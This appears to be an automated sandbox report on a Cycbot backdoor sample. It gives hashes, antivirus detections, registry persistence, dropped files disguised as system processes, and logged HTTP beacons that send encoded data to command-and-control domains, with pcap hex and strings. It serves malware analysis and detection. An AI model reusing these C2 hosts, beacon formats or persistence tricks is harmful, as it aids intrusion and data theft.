Analysis Date2014-07-03 00:49:18
MD530b20e27faf03463ea1d75b8c5b2cd8f
SHA13c5e1f5bf2477876b27b84d0a111340b663d1c56

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4d43ca00317668071c98dc85b66c5632 sha1: 75d394f026a7aa3c3e0349a65777f333d2043290 size: 158208
Section.rdata md5: be38128c87059c301cddd21296e3d2bc sha1: 12abf39d31d47f1b4d21ce82479857cd7085e2c7 size: 2560
Section.data md5: 1428404a3af6705e571d2ac7d37cfdc8 sha1: fa4ba0d898ae79b8ee0c6a5459c0ddbb4cd24af0 size: 19456
Section.crt md5: abaf94c21655a721a5918d1f7d24ca0e sha1: 028b3c39e8698b5dea0db2e033d2bd27b2defda1 size: 512
Timestamp2005-10-15 02:50:25
VersionPrivateBuild: 1090
PEhash54b5efee11eb8a8ced6eb37b7f71cd19a71fbfda
IMPhashd995bf56099ac59253b629326031a54a
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Agent.psa.35
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-100689
AVDr. WebTrojan.DownLoader1.60512
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KFV
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVGrisoft (avg)Cryptic.CCK
AVIkarusGen.Variant.Kazy
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.127647D7
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSofflineservermonitoring.com
Winsock DNSzonetk.com
Winsock DNSzonere.com
Winsock DNSthebestpageintheuniverse.net

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSthebestpageintheuniverse.net
Type: A
216.22.0.192
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.235
DNSzonetf.com
Type: A
208.73.211.233
DNSzonetf.com
Type: A
208.73.211.174
DNSzonetf.com
Type: A
208.73.210.219
DNSzonere.com
Type: A
8.5.1.39
DNSofflineservermonitoring.com
Type: A
DNSzonetk.com
Type: A
HTTP GEThttp://thebestpageintheuniverse.net/d.cgi?tq=gP4aKydUm7KnipgFn%2Byc6A9HYFRj%2Fk5ewpeQ0NpPdlo%2BOZzl9YPH4KSvmGINQGWAgXd0oVhulXrlGnsUo1iNkMAQLEJcw69Fn93HNKWaI7bGQ7S5v91XFuNROna5oo1VPC0ysTO6O3%2FJ39u9aYOMjXCb4YEM%2B4HXgNbcLYS391hWAVIHxu1VGxmVQ9P88S7zgI1u1Bp5fcHT1roA9o0a3jDoe%2FCyqeZTZaKPv2dn7U6rdoWQFsSC9Vf7qGnVPFocSrioDf0qaFCEAyZeRjW2hvE397EOzty5UjFg4k3pDXmHny7Sq2Jdqa4EeEiEe%2F9Qmq7gWtuN%2BywbZRCVXLzgg8DJVLJgZkSJQoLQmih9T%2Bmoe13PgMcmL%2Bvur3AJrC5NaF%2BXvsXiLjRY%2FIhnOgLY0ICdnvRocD5ENpce6xajtJ5RDxKGouJeiDG7RdCl1OcVw8tMNbwpCYm7yX4U2gffdVBzxocn8KooLn4KyQicR5f%2FVk04BdSDuo8qQ4nX8hmnnQH%2Fx63jiStFz%2FGaQNtzcj%2BL11rc66e4LhgUQ%2F5n9MZ0UQ2jrY3XvtR8pHwfA9YD%2FAMxZJuPrQp0A%2FM7am3Www7lzW9IVSbxMXT9T%2FgEzFlvA0PJmf2ZmTFwbKb%2BChxp5M8hHJVtdSXKbXI2Wr8IZ%2B3CpLSpOSgUOJRE8PW
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonere.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQj1OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
Flows TCP192.168.1.1:1031 ➝ 216.22.0.192:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1033 ➝ 8.5.1.39:80

Raw Pcap
0x00000000 (00000)   47455420 2f642e63 67693f74 713d6750   GET /d.cgi?tq=gP
0x00000010 (00016)   34614b79 64556d37 4b6e6970 67466e25   4aKydUm7KnipgFn%
0x00000020 (00032)   32427963 36413948 5946526a 2532466b   2Byc6A9HYFRj%2Fk
0x00000030 (00048)   35657770 6551304e 7050646c 6f253242   5ewpeQ0NpPdlo%2B
0x00000040 (00064)   4f5a7a6c 39595048 344b5376 6d47494e   OZzl9YPH4KSvmGIN
0x00000050 (00080)   51475741 67586430 6f566875 6c58726c   QGWAgXd0oVhulXrl
0x00000060 (00096)   476e7355 6f31694e 6b4d4151 4c454a63   GnsUo1iNkMAQLEJc
0x00000070 (00112)   77363946 6e393348 4e4b5761 49376247   w69Fn93HNKWaI7bG
0x00000080 (00128)   51375335 76393158 46754e52 4f6e6135   Q7S5v91XFuNROna5
0x00000090 (00144)   6f6f3156 50433079 73544f36 4f332532   oo1VPC0ysTO6O3%2
0x000000a0 (00160)   464a3339 75396159 4f4d6a58 43623459   FJ39u9aYOMjXCb4Y
0x000000b0 (00176)   454d2532 42344858 674e6263 4c595333   EM%2B4HXgNbcLYS3
0x000000c0 (00192)   39316857 41564948 78753156 47786d56   91hWAVIHxu1VGxmV
0x000000d0 (00208)   51395038 3853377a 67493175 31427035   Q9P88S7zgI1u1Bp5
0x000000e0 (00224)   66634854 31726f41 396f3061 336a446f   fcHT1roA9o0a3jDo
0x000000f0 (00240)   65253246 43797165 5a545a61 4b507632   e%2FCyqeZTZaKPv2
0x00000100 (00256)   646e3755 3672646f 57514673 53433956   dn7U6rdoWQFsSC9V
0x00000110 (00272)   66377147 6e565046 6f635372 696f4466   f7qGnVPFocSrioDf
0x00000120 (00288)   30716146 43454179 5a65526a 57326876   0qaFCEAyZeRjW2hv
0x00000130 (00304)   45333937 454f7a74 7935556a 4667346b   E397EOzty5UjFg4k
0x00000140 (00320)   33704458 6d486e79 37537132 4a647161   3pDXmHny7Sq2Jdqa
0x00000150 (00336)   34456545 69456525 32463951 6d713767   4EeEiEe%2F9Qmq7g
0x00000160 (00352)   5774754e 25324279 77625a52 4356584c   WtuN%2BywbZRCVXL
0x00000170 (00368)   7a676738 444a564c 4a675a6b 534a516f   zgg8DJVLJgZkSJQo
0x00000180 (00384)   4c516d69 68395425 32426d6f 65313350   LQmih9T%2Bmoe13P
0x00000190 (00400)   674d636d 4c253242 76757233 414a7243   gMcmL%2Bvur3AJrC
0x000001a0 (00416)   354e6146 25324258 76735869 4c6a5259   5NaF%2BXvsXiLjRY
0x000001b0 (00432)   25324649 686e4f67 4c593049 43646e76   %2FIhnOgLY0ICdnv
0x000001c0 (00448)   526f6344 35454e70 63653678 616a744a   RocD5ENpce6xajtJ
0x000001d0 (00464)   35524478 4b476f75 4a656944 47375264   5RDxKGouJeiDG7Rd
0x000001e0 (00480)   436c314f 63567738 744d4e62 77704359   Cl1OcVw8tMNbwpCY
0x000001f0 (00496)   6d377958 34553267 66666456 427a786f   m7yX4U2gffdVBzxo
0x00000200 (00512)   636e384b 6f6f4c6e 344b7951 69635235   cn8KooLn4KyQicR5
0x00000210 (00528)   66253246 566b3034 42645344 756f3871   f%2FVk04BdSDuo8q
0x00000220 (00544)   51346e58 38686d6e 6e514825 32467836   Q4nX8hmnnQH%2Fx6
0x00000230 (00560)   336a6953 74467a25 32464761 514e747a   3jiStFz%2FGaQNtz
0x00000240 (00576)   636a2532 424c3131 72633636 65344c68   cj%2BL11rc66e4Lh
0x00000250 (00592)   67555125 3246356e 394d5a30 5551326a   gUQ%2F5n9MZ0UQ2j
0x00000260 (00608)   72593358 76745238 70487766 41395944   rY3XvtR8pHwfA9YD
0x00000270 (00624)   25324641 4d785a4a 75507251 70304125   %2FAMxZJuPrQp0A%
0x00000280 (00640)   32464d37 616d3357 7777376c 7a573949   2FM7am3Www7lzW9I
0x00000290 (00656)   56536278 4d585439 54253246 67457a46   VSbxMXT9T%2FgEzF
0x000002a0 (00672)   6c764130 504a6d66 325a6d54 4677624b   lvA0PJmf2ZmTFwbK
0x000002b0 (00688)   62253242 43687870 354d3868 484a5674   b%2BChxp5M8hHJVt
0x000002c0 (00704)   6453584b 62584932 57723849 5a253242   dSXKbXI2Wr8IZ%2B
0x000002d0 (00720)   3343704c 53704f53 67554f4a 52453850   3CpLSpOSgUOJRE8P
0x000002e0 (00736)   57204854 54502f31 2e300d0a 436f6e6e   W HTTP/1.0..Conn
0x000002f0 (00752)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000300 (00768)   6f73743a 20746865 62657374 70616765   ost: thebestpage
0x00000310 (00784)   696e7468 65756e69 76657273 652e6e65   intheuniverse.ne
0x00000320 (00800)   740d0a41 63636570 743a202a 2f2a0d0a   t..Accept: */*..
0x00000330 (00816)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000340 (00832)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a373620   on: close....76 
0x00000150 (00336)   36643437 34393465 2020204f 5a7a6c39   6d47494e   OZzl9
0x00000160 (00352)   59504834 4b53766d 47494e0a            YPH4KSvmGIN.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 6a314f6a 62777667 53393137   fBvQj1OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6572652e 636f6d0d   ost: zonere.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a44 304f704c 6a527141   .11....D0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a373620   on: close....76 
0x00000150 (00336)   36643437 34393465 2020204f 5a7a6c39   6d47494e   OZzl9
0x00000160 (00352)   59504834 4b53766d 47494e0a            YPH4KSvmGIN.


Strings
.
..
040904b0
1090
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
4**?q*
5l+]j3
6eR})]N
^6hMl@
6j2<zH
6o7mTf
-8*Tlh
8}tN|u
97bJ;}b
9bkSg)
9|mVI~
ADVAPI32.dll
Bns"\UP
CloseHandle
CoCreateGuid
CoCreateInstance
CoInitialize
CoSetProxyBlanket
CoUninitialize
CreateFileA
@.data
DeleteCriticalSection
DgS2UV
E&{*KL
EnterCriticalSection
EnumResourceNamesA
EnumSystemLocalesA
ExitProcess
*f***/
F.[bl%NC
fsYZWh
GetClassLongA
GetCommandLineA
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetFullPathNameA
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetThreadPriority
GetUserDefaultLCID
GetVersionExA
GlobalAlloc
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
Hm9]^[
hS6hfx@
I~2-~v
I*6a.o
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
IsValidLocale
*iV**YV
je6h|2@
|Jh<a6h
(Jo,hjk
KERNEL32.dll
^kn.Gy
ko*h+E$
LCMapStringA
LCMapStringW
LeaveCriticalSection
L'#I@]
Lk^/nN
MC;_	x
MessageBoxW
!MSSzWK
MultiByteToWideChar
]N6v4Z
N9.5.5/
NbHu%2
 nivx8
N~W^.c
oE*n)3
ole32.dll
P*[[Eo
*PttM:
Q7UKLu
qtt9YU~
Qv58%l
RaiseException
*R|<an
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExW
RegSetValueExW
RPCRT4.dll
RtlUnwind
SetCommConfig
SetEndOfFile
SetStdHandle
SetUnhandledExceptionFilter
SHCreateDirectoryExW
SHELL32.dll
SHFileOperationW
SHGetFolderPathW
StringFromGUID2
T^6h;^@
TerminateProcess
!This program cannot be run in DOS mode.
=T#-p.
[*&u[-
UnhandledExceptionFilter
USER32.dll
UuidCreate
-UY?=2
;*=v4~
vHkNoJ
VkYw9A4
v:O9z}
w2Ez:(E
W{5eH!y8Xs
W6h{{@
^W6In)J1
*}w*ff
WideCharToMultiByte
WriteConsoleA
WriteConsoleW
WriteFile
XEME:\
zTF6hR